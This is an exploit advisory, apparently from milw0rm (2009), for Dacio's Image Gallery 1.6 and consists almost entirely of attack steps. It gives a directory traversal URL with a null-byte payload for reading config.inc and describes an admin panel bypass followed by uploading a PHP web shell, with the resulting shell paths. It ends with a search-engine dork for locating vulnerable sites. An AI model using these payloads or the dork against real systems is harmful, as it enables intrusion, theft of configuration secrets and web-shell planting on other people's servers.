Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload



EKU-ID: 16462 CVE: OSVDB-ID:
Author: ahmadbady Published: 2009-05-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


=-=-Local Directory Traversal/bypass/shell upload/-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::Dacio_imgGal-v1.6
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.kopicaidej.net/index.php?com=hex&Dld=59

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Directory Traversal:

/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00
------
bypass and upload:

go to admin.php(Panel Bypassed)  and add image (shell upload)

shell: /images/beauty_1/shell.php  if deleted beauty_1

create a new gallery

example aa:

shell:  /images/aa/shell.php
-----
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=
dork: intitle:"Dacio's Image Gallery"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=

# milw0rm.com [2009-05-11]